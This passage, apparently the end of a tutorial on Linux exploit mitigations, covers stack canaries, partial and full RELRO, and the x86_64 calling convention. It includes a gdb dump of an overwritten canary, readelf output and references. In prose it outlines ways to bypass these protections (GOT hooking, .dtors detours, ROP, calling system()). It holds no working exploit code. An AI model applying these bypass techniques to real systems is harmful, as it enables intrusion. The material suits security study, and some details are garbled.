0x7fffffffe130: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe140: 0x41414141 0x41414141 0xbf630041 0xe3b6079a
0x7fffffffe150: 0xffffe170 0x00007fff 0x004005d0 0x00000000
0x7fffffffe160: 0xffffe258 0x00007fff 0x00000000 0x00000002
0x7fffffffe170: 0x00000000 0x00000000
At “0x7fffffffe148”, we have rewrote 1 byte of the stack cookie value saved on RSP (that’s why the breakpoint 2 stopped __stack_chk_fail()). At “0x7fffffffe158” , we see the return address of main. So the structure of this canary should be like in figure 3:
There are 3 kinds of canaries:
- Null (0x0),
- terminator (letting the first bytes to be “\a0\xff”),
- random.
The first 2 kinds are easy to bypass[14], because you just have to fill the buffer with your shellcode, giving a desired value to be at the right position and rewrite the instruction pointer. But for the random one, it is a little more fun, because you have to guess its value at each execution (Ow! A kind like ASLR?).
For random canaries, the “__gard__setup()” fills a global variable with random bytes generated by “/dev/urandom”, if possible. Latter in the program, only 4|8 bytes are used to be the cookie. But, if we cannot use the entropy of “/dev/urandom”, by default we will get a terminator or a null cookie.
Brute-force is a way, but you will use to much time. By overwriting further than the return address, we can hook the execution flow using GOT entries. The canary will of course detect the compromising, but too late. A very good article covering the StackGuard and StackShield explain four ways to bypass these protections[15].
However, on new kernels you also have to noticed that the random cookie is set with a null-byte at the end, and trying to recover the value from forking or brute-forcing will not work with functions like “strcpy”. So the better way to do that, is to have the control of the initialized cookie.
Format string vulnerabilities or heap overflow for example, are more easy to exploit with this protection, but this article is not finished yet and we will see another memory corruption mitigation technique.
RELRO
In recent Linux distributions, a memory corruption mitigation technique has been introduced to harden the data sections for binaries/processes. This protection can be viewable reading the program headers (with readelf for example):
[...]
Program Headers:
[...]
GNU_RELRO 0x0000000000000e28 0x0000000000600e28 0x0000000000600e28
0x00000000000001d8 0x00000000000001d8 R 1
On current Linux, your binaries are often compiled with RELRO. So that mean that following sections are mapped as read-only:
Optionally, you can compare dissecting a non-RELRO binary, as follows:
[…]
LOAD 0x0000000000000768 0x0000000000600768 0x0000000000600768
0x0000000000000200 0x0000000000000210 RW 200000
[…]
03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
[...]
The exploitation of a format string bug for example, using the format parameter “%n” to write to any arbitrary address like GOTs is suppose to fail. But as we noticed previously, PLT GOTs have “write” permissions and then we are face to a partial-RELRO only.
With the example in trapkit’s article about RELRO[16], we could see that it is very easy to rewrite a PLT entry. But in some cases (mostly in dist-packages), binaries are compiled with a full-RELRO:
[..]
fluxiux@handgrep:~/relro$ readelf -l ./fullrelro | grep "RELRO"
GNU_RELRO 0x0000000000000df8 0x0000000000600df8 0x0000000000600df8
fluxiux@handgrep:~/relro$ readelf -d ./fullrelro | grep "BIND"
0x0000000000000018 (BIND_NOW)
Note: BIND_NOW indicates that the binary is using full-RELRO.
The entire GOT is remapped as read-only, but there are other sections to write on. GOTs are use mostly for flexibility. Detour with “.dtors” can be perform as Sebastian Krahmer described in his article about RELRO[17].
We have seen common Linux protection used by default, but the evolution of kernels and architectures have made things more difficult.
The x86_64 fact and current systems hardening
With time, the new versions of Linux distribution become well hardened by default. In my studies, the Ubuntu one surprised me a lot, because in addition to these protections implanted by default, this system turns to take some openBSD solutions to be as user friendly and secure as possible. Moreover, we have seen few protections and ways to bypass it, but the 64-bits give us other difficulties.
As you notices, addresses have changed and it more difficult to exploit some memory corruption because of the byte “\x00”, considered as a EOF for some functions like “strcpy()”. We saw that NX is enabled and the compilation in gcc with its support are made by default. But the worst is coming. Indeed, we now that the randomization space is larger but what interest us, is the System V ABI for x86_64[8].
Things have changed for parameters in functions. Indeed, instead of copying parameters in the stack, the first 6 integer and 8 float/double/vector arguments are passed in registers, rest on stack. See an example:
typedef struct {
int a , b ;
double d ;
} structparm ;
structparm s ;
int e , f , g , h , i , j , k ;
long double ld ;
double m , n ;
__m256 y ;
extern void func ( int e , int f ,
structparm s , int g , int h ,
long double ld , double m ,
__m256 y ,
double n , int i , int j , int k ) ;
func (e , f , s , g , h , ld , m , y , n , i , j , k ) ;
The given register allocation looks like this (in figure 4):
Figure 4 – Register allocation example
(source: System V ABI x86_64)
I suggest you to read the slides Jon Larimer about “Intro to x64 Reversing”[18].
We could use the knowledge of borrowed code chunks’ article[19] that can help us to understand problems of NX, System V ABI x86_64 differences with x32, and ways to bypass them using instructions to write a value on one register, and call the function “system()”, for example, that will use this register as a parameter.
Other sophisticated attacks like Return-oriented Programing are use to bypass these protection that make life difficult in an exploit process.
As you could see, protections didn’t make things impossible, but just harder and harder. So be aware of new applied protections and conventions to not waste too much time.
References & Acknowledgements
[1] ELF HOWTO –
http://cs.mipt.ru/docs/comp/eng/os/linux/howto/howto_english/elf/elf-howto-1.html
[2] Tool Interface Standard (TIS) Executable and
Linking Format (ELF) Specification
[3] Working with the ELF Program
Format – http://www.ouah.org/RevEng/x430.htm
[4] Executable_and_Linkable_Format#Applications
-http://www.linuxjournal.com/article/1060
http://en.wikipedia.org/wiki/Executable_and_Linkable_Format#Applications
[5] elf.h: ELF types, structures, and macros –
http://sourceware.org/git/?p=glibc.git;a=blob_plain;f=elf/elf.h
[6] The ELF Object File Format by Dissection –
http://www.linuxjournal.com/article/1060
[7] Smashing the stack for fun and Profit –
http://www.phrack.org/issues.html?issue=49&id=14#article
[8] System V Application Binary Interface on x86-64 –
http://www.x86-64.org/documentation/abi.pdf
[9] Hacking – The art of exploitation (by Jon
Erickson)
[10] Local bypass of Linux ASLR through /proc
information leaks –
http://blog.cr0.org/2009/04/local-bypass-of-linux-aslr-through-proc.html
[11] Fuzzy ASLR – http://code.google.com/p/fuzzyaslr/
[12] ASLR bypass using ret2reg –
http://www.exploit-db.com/download_pdf/17049
[13] /dev/urandom –
http://en.wikipedia.org/wiki//dev/urandom
[14] Stack Smashing Protector (FreeBSD) –
http://www.hackitoergosum.org/2010/HES2010-prascagneres-Stack-Smashing-Protector-in-FreeBSD.pdf
[15] Four different tricks to bypass StackShield and
StackGuard protection –
http://www.coresecurity.com/files/attachments/StackguardPaper.pdf<br q="" [16]="" relro:="" not="" so="" well="" known="" memory="" -="" http://tk-blog.blogspot.com/2009/02/relro-not-so-well-known-memory.http://tk-blog.blogspot.com/2009/02/relro-not-so-well-known-memory.htmlhtml
[17] RELRO by Sebastian Krahmer –
http://www.suse.de/%7Ekrahmer/relro.txt
[18] Intro to x64 reversing –
http://lolcathost.org/b/introx86.pdf
[19] x86-64 buffer overflow exploits and the borrowed
code chunks – http://www.suse.de/~krahmer/no-nx.pdf